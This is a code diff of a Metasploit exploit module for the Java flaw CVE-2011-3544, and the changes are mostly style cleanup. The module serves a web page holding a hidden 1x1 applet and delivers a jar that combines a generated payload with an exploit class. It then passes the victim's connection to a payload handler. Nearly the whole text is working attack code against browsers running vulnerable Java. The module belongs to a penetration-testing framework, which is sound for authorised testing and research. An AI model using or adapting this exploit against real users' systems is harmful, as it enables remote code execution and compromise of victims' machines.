@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
 
   include Msf::Exploit::Remote::BrowserAutopwn
-  autopwn_info({ :javascript => false })
+  autopwn_info({ javascript: false })
 
   def initialize(info = {})
     super(
@@ -36,13 +36,12 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'ZDI', '11-305' ],
           [ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ],
         ],
-        'Platform' => %w{java linux win},
         'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
         'Targets' => [
           [
             'Generic (Java Payload)',
             {
-              'Arch' => ARCH_JAVA,
+              'Arch' => ARCH_JAVA
             }
           ],
           [
@@ -79,20 +78,20 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    if not request.uri.match(/\.jar$/i)
-      if not request.uri.match(/\/$/)
-        send_redirect(cli, get_resource() + '/', '')
+    if !request.uri.match(/\.jar$/i)
+      if !request.uri.match(%r{/$})
+        send_redirect(cli, get_resource + '/', '')
         return
       end
 
-      print_status("#{self.name} handling request")
+      print_status("#{name} handling request")
 
       send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
       return
     end
 
     paths = [
-      [ "Exploit.class" ]
+      [ 'Exploit.class' ]
     ]
 
     p = regenerate_payload(cli)
@@ -100,28 +99,28 @@ class MetasploitModule < Msf::Exploit::Remote
     jar = p.encoded_jar
     paths.each do |path|
       1.upto(path.length - 1) do |idx|
-        full = path[0, idx].join("/") + "/"
+        full = path[0, idx].join('/') + '/'
         if !(jar.entries.map { |e| e.name }.include?(full))
           jar.add_file(full, '')
         end
       end
-      fd = File.open(File.join(Msf::Config.data_directory, "exploits", "cve-2011-3544", path), "rb")
+      fd = File.open(File.join(Msf::Config.data_directory, 'exploits', 'cve-2011-3544', path), 'rb')
       data = fd.read(fd.stat.size)
-      jar.add_file(path.join("/"), data)
+      jar.add_file(path.join('/'), data)
       fd.close
     end
 
-    print_status("Sending Applet.jar")
-    send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })
+    print_status('Sending Applet.jar')
+    send_response(cli, jar.pack, { 'Content-Type' => 'application/octet-stream' })
 
     handler(cli)
   end
 
   def generate_html
-    html = "<html><head></head>"
-    html += "<body>"
-    html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
-    html += "</applet></body></html>"
+    html = '<html><head></head>'
+    html += '<body>'
+    html += '<applet archive="Exploit.jar" code="Exploit.class" width="1" height="1">'
+    html += '</applet></body></html>'
     return html
   end
 end
